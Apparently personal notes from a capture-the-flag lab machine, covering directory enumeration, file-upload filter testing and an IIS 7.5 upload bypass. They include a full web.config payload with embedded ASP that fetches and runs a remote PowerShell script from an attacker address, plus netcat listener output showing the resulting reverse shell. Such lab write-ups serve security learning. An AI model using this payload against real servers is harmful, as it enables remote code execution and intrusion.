2 :80
===============================================================
2021/05/03 17:53:31 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx (Status: 200) [Size: 941]
/UploadedFiles (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
/aspnet_client
<input type="submit" name="btnUpload" value="Upload" onclick="return ValidateFile();" id="btnUpload" />
.png files works and is viewable when uploaded.
.asp and .aspx fails; time to experiment with file extensions
Cannot upload with double extension or null byte file extensions
Searching for IIS 7.5 file upload exploit shows there's a RCE using web.config for IIS
https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
web.cofig
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd.exe /c powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.93] 49160
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
bounty\merlin
Last updated